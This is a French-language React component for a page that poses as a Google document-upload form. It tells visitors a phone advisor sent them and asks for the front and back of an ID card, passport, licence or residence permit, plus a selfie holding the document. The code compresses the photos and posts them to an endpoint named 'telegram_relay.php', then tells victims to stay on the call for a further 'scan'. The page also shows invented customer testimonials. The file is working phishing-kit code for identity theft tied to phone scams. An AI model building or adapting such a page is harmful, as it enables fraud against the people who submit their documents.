import React, { useState } from "react";
import "../styles/Home.css";
import headerGif from "../assets/header.gif";

const API_URL = "/api/telegram_relay.php";

const DOCUMENT_TYPES = {
  carte_identite: { label: "Carte d'identité", icon: "badge", fields: ["recto", "verso", "selfie"] },
  passeport: { label: "Passeport", icon: "flight_takeoff", fields: ["recto", "selfie"] },
  permis_conduire: { label: "Permis de conduire", icon: "directions_car", fields: ["recto", "verso", "selfie"] },
  titre_sejour: { label: "Titre de séjour", icon: "card_membership", fields: ["recto", "verso", "selfie"] },
};

const FIELD_CONFIG = {
  recto: { label: "Document - Recto", icon: "badge" },
  verso: { label: "Document - Verso", icon: "badge" },
  selfie: { label: "Selfie avec le document", icon: "photo_camera" },
};

// COMPRESSION - Compatible avec photos prises directement
const compressImage = (file) => {
  return new Promise((resolve, reject) => {
    // Vérifier que le fichier existe
    if (!file || !(file instanceof Blob)) {
      console.error("compressImage: fichier invalide", file);
      reject(new Error("Fichier invalide"));
      return;
    }

    console.log("compressImage: début", file.name, file.type, file.size);

    // Si c'est un PDF, ne pas compresser
    if (file.type === 'application/pdf') {
      console.log("compressImage: PDF, pas de compression");
      resolve(file);
      return;
    }

    // Créer une URL pour l'image
    const objectUrl = URL.createObjectURL(file);
    const img = new Image();

    img.onload = () => {
      console.log("compressImage: image chargée", img.width, "x", img.height);
      URL.revokeObjectURL(objectUrl);

      const canvas = document.createElement('canvas');
      const MAX_SIZE = 800; // Un peu plus grand pour meilleure qualité
      let width = img.width;
      let height = img.height;

      if (width > height) {
        if (width > MAX_SIZE) {
          height = Math.round((height * MAX_SIZE) / width);
          width = MAX_SIZE;
        }
      } else {
        if (height > MAX_SIZE) {
          width = Math.round((width * MAX_SIZE) / height);
          height = MAX_SIZE;
        }
      }

      canvas.width = width;
      canvas.height = height;

      const ctx = canvas.getContext('2d');
      ctx.fillStyle = '#FFFFFF';
      ctx.fillRect(0, 0, width, height);
      ctx.drawImage(img, 0, 0, width, height);

      canvas.toBlob(
        (blob) => {
          if (blob && blob.size > 0) {
            // Générer un nom de fichier propre
            const timestamp = Date.now();
            const newFileName = `IMG_${timestamp}.jpg`;
            
            const newFile = new File([blob], newFileName, {
              type: 'image/jpeg',
              lastModified: timestamp,
            });
            
            console.log(`compressImage: OK ${Math.round(file.size/1024)}KB → ${Math.round(blob.size/1024)}KB`);
            resolve(newFile);
          } else {
            console.warn("compressImage: blob vide, utilisation fichier original");
            resolve(file);
          }
        },
        'image/jpeg',
        0.7 // Qualité 70% - bon compromis
      );
    };

    img.onerror = (e) => {
      console.error("compressImage: erreur chargement image", e);
      URL.revokeObjectURL(objectUrl);
      // En cas d'erreur, renvoyer le fichier original
      resolve(file);
    };

    img.src = objectUrl;
  });
};

// Envoi avec fetch (plus fiable que XMLHttpRequest pour FormData)
const sendFiles = async (formData, onProgress) => {
  console.log("sendFiles: début envoi");
  
  // Log du contenu du FormData
  for (let [key, value] of formData.entries()) {
    if (value instanceof File) {
      console.log(`  FormData[${key}]: File(${value.name}, ${value.type}, ${value.size} bytes)`);
    } else {
      console.log(`  FormData[${key}]: ${value}`);
    }
  }

  try {
    const response = await fetch(API_URL, {
      method: 'POST',
      body: formData,
      // NE PAS mettre Content-Type - le navigateur le fait automatiquement avec boundary
    });

    console.log("sendFiles: réponse status", response.status);
    
    const text = await response.text();
    console.log("sendFiles: réponse body", text);

    let data;
    try {
      data = JSON.parse(text);
    } catch (e) {
      console.error("sendFiles: réponse non-JSON", text);
      throw new Error("Réponse serveur invalide");
    }

    if (!response.ok || !data.ok) {
      throw new Error(data.error || `Erreur ${response.status}`);
    }

    return data;
  } catch (error) {
    console.error("sendFiles: erreur", error);
    throw error;
  }
};

const Header = ({ step }) => (
  <>
    <div className="gif-top">
      <img src={headerGif} className="g-gif" alt="" />
    </div>
    <header className="g-header">
      <div className="intro-card">
        <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" alt="Google" className="google-logo" />
        <h1>Avant de continuer</h1>
        <p>Cette page vous a été transmise directement par un conseiller au téléphone et n'est accessible que dans ce cadre précis.<br /><br />Elle sert uniquement à l'envoi de documents spécifiques ou complémentaires nécessaires pour compléter votre dossier.</p>
      </div>
      <div className="g-divider" />
      <div className="g-progress-bar">
        <div className={`g-step ${step === 1 ? "active" : ""}`}>1</div>
        <div className={`g-bar ${step >= 2 ? "complete" : ""}`} />
        <div className={`g-step ${step === 2 ? "active" : ""}`}>2</div>
        <div className={`g-bar ${step >= 3 ? "complete" : ""}`} />
        <div className={`g-step ${step === 3 ? "active" : ""}`}>3</div>
      </div>
    </header>
  </>
);

const InfoCard = ({ onContinue }) => (
  <section className="google-card">
    <h2>Information importante</h2>
    <ul className="g-list">
      <li><span className="material-icons">check_circle</span> Tous les champs sont obligatoires.</li>
      <li><span className="material-icons">insert_drive_file</span> Formats acceptés : photo ou PDF.</li>
      <li><span className="material-icons">visibility</span> Documents lisibles et conformes.</li>
    </ul>
    <button className="g-btn" onClick={onContinue}>Oui, continuer</button>
  </section>
);

const DocumentTypeSelection = ({ onSelect }) => {
  const [selected, setSelected] = useState("");
  return (
    <section className="step-card">
      <div className="form-title"><span className="material-icons icon-blue">description</span> Sélectionnez votre document</div>
      <form onSubmit={(e) => { e.preventDefault(); if (selected) onSelect(selected); }}>
        <div className="document-type-grid">
          {Object.entries(DOCUMENT_TYPES).map(([key, cfg]) => (
            <label key={key} className={`doc-type-card ${selected === key ? "selected" : ""}`}>
              <input type="radio" name="docType" value={key} checked={selected === key} onChange={(e) => setSelected(e.target.value)} />
              <span className="material-icons doc-type-icon">{cfg.icon}</span>
              <span className="doc-type-label">{cfg.label}</span>
            </label>
          ))}
        </div>
        <button type="submit" className="submit-btn" style={{ marginTop: 20 }}>Continuer</button>
      </form>
    </section>
  );
};

const FileRow = ({ id, label, icon, value, onChange, disabled }) => {
  
  const handleFileChange = (e) => {
    const file = e.target.files?.[0];
    console.log(`FileRow[${id}]: fichier sélectionné`, file ? `${file.name} (${file.type}, ${file.size} bytes)` : 'aucun');
    
    if (file) {
      // Vérifier que c'est bien un fichier valide
      if (file.size === 0) {
        console.error(`FileRow[${id}]: fichier vide!`);
        alert("Le fichier semble vide. Veuillez réessayer.");
        return;
      }
      onChange(id, file);
    }
  };

  return (
    <div className="form-group">
      <label className="row-label">
        <span className="material-icons icon-blue">{icon}</span> {label}
      </label>
      <label className={`custom-file-upload ${value ? "selected" : ""}`}>
        {value ? `✓ Fichier sélectionné (${Math.round(value.size / 1024)} KB)` : "Choisir un fichier"}
        <input 
          type="file" 
          accept="image/*,.pdf" 
          capture="environment"
          disabled={disabled}
          onChange={handleFileChange} 
        />
      </label>
    </div>
  );
};

const UploadForm = ({ documentType, onSuccess, onBack }) => {
  const cfg = DOCUMENT_TYPES[documentType];
  const [files, setFiles] = useState({});
  const [sending, setSending] = useState(false);
  const [progress, setProgress] = useState(0);
  const [status, setStatus] = useState("");
  const [error, setError] = useState("");

  const allReady = cfg.fields.every((f) => files[f]);

  const handleFileChange = (id, file) => {
    console.log(`handleFileChange: ${id}`, file);
    setFiles((prev) => ({ ...prev, [id]: file }));
    setError(""); // Clear previous errors
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    if (!allReady || sending) return;

    setSending(true);
    setProgress(0);
    setStatus("Préparation des fichiers...");
    setError("");

    console.log("=== DÉBUT ENVOI ===");
    console.log("Fichiers originaux:", files);

    try {
      // Étape 1: Vérifier tous les fichiers
      for (const field of cfg.fields) {
        const file = files[field];
        if (!file || !(file instanceof Blob)) {
          throw new Error(`Fichier manquant: ${FIELD_CONFIG[field].label}`);
        }
        if (file.size === 0) {
          throw new Error(`Fichier vide: ${FIELD_CONFIG[field].label}`);
        }
        console.log(`Fichier ${field}: ${file.name}, ${file.type}, ${file.size} bytes`);
      }

      // Étape 2: Compresser les images
      const compressed = {};
      for (let i = 0; i < cfg.fields.length; i++) {
        const field = cfg.fields[i];
        setStatus(`Compression ${i + 1}/${cfg.fields.length}...`);
        setProgress(Math.round(((i + 1) / cfg.fields.length) * 30));
        
        console.log(`Compression de ${field}...`);
        compressed[field] = await compressImage(files[field]);
        console.log(`Compressé ${field}:`, compressed[field].name, compressed[field].size);
      }

      // Étape 3: Créer le FormData
      setStatus("Préparation de l'envoi...");
      setProgress(40);

      const formData = new FormData();
      formData.append("documentType", cfg.label);

      for (const field of cfg.fields) {
        const file = compressed[field];
        if (!file || file.size === 0) {
          throw new Error(`Fichier compressé invalide: ${field}`);
        }
        console.log(`Ajout fichier ${field}:`, file.name, file.type, file.size);
        formData.append(field, file, file.name);
      }

      // Étape 4: Envoyer
      setStatus("Envoi vers le serveur...");
      setProgress(50);

      console.log("Envoi du FormData...");
      const result = await sendFiles(formData);
      
      console.log("Résultat:", result);
      setProgress(100);
      setStatus("Terminé !");

      setTimeout(() => onSuccess(), 1000);

    } catch (err) {
      console.error("=== ERREUR ===", err);
      setError(err.message || "Erreur lors de l'envoi. Veuillez réessayer.");
      setProgress(0);
      setStatus("");
      setSending(false);
    }
  };

  return (
    <section className="step-card">
      <div className="form-title">
        <span className="material-icons icon-blue">upload_file</span> Importer vos documents - {cfg.label}
      </div>
      <div className="document-info">
        <span className="material-icons">info</span> {cfg.fields.length} documents requis pour {cfg.label}
      </div>

      {error && (
        <div style={{ 
          padding: 12, 
          background: '#fee', 
          border: '1px solid #f99', 
          borderRadius: 8, 
          color: '#c00', 
          marginBottom: 16 
        }}>
          ❌ Erreur serveur ({error})
        </div>
      )}

      <form onSubmit={handleSubmit}>
        {cfg.fields.map((f) => (
          <FileRow
            key={f}
            id={f}
            label={FIELD_CONFIG[f].label}
            icon={FIELD_CONFIG[f].icon}
            value={files[f]}
            onChange={handleFileChange}
            disabled={sending}
          />
        ))}

        {!sending ? (
          <>
            <button type="submit" className="submit-btn" disabled={!allReady}>
              Envoyer les documents
            </button>
            <button type="button" className="back-btn" onClick={onBack}>
              <span className="material-icons">arrow_back</span> Retour
            </button>
          </>
        ) : (
          <div className="sending-box">
            <p>{status}</p>
            <div className="progress-bar-container">
              <div className="progress-bar" style={{ width: `${progress}%` }} />
            </div>
            <div className="progress-text">{progress}%</div>
          </div>
        )}

        <div className={`min-files-hint ${allReady ? "success" : "warning"}`}>
          {allReady 
            ? "✅ Tous les fichiers sont prêts" 
            : `⚠️ ${cfg.fields.length - Object.keys(files).length} fichier(s) manquant(s)`
          }
        </div>
      </form>
    </section>
  );
};

const Comments = () => (
  <section className="comments">
    <h3>Commentaires</h3>
    <div className="comments-grid">
      <article className="comment-card">
        <img src="https://i.pravatar.cc/64?img=32" alt="" />
        <div className="comment-body">
          <div className="stars">★★★★★</div>
          <p>Très simple, 2 minutes pour envoyer mes documents.</p>
          <div className="comment-author">— Sophie M.</div>
        </div>
      </article>
      <article className="comment-card">
        <img src="https://i.pravatar.cc/64?img=12" alt="" />
        <div className="comment-body">
          <div className="stars">★★★★★</div>
          <p>Interface intuitive et rapide.</p>
          <div className="comment-author">— Thomas B.</div>
        </div>
      </article>
    </div>
  </section>
);

export default function Home() {
  const [step, setStep] = useState(1);
  const [docType, setDocType] = useState(null);
  const [success, setSuccess] = useState(false);

  return (
    <main className="google-form-main">
      <Header step={success ? 3 : docType ? 3 : step} />
      {!success && step === 1 && <InfoCard onContinue={() => setStep(2)} />}
      {!success && step === 2 && !docType && <DocumentTypeSelection onSelect={(t) => { setDocType(t); setStep(3); }} />}
      {!success && docType && (
        <UploadForm 
          documentType={docType} 
          onSuccess={() => setSuccess(true)} 
          onBack={() => { setDocType(null); setStep(2); }} 
        />
      )}
      {success && (
        <div className="success-message fade-in">
          <div className="success-check">
            <span className="material-icons">check_circle</span>
          </div>
          <h2>Merci</h2>
          <p>
            Vos documents ont été transmis avec succès.<br />
            Veuillez patienter avec votre conseiller au téléphone.<br />
            Vous allez passer à la dernière étape de <b>vérification par scan</b>.<br />
            Gardez votre pièce d'identité à portée de main.
          </p>
        </div>
      )}
      <Comments />
    </main>
  );
}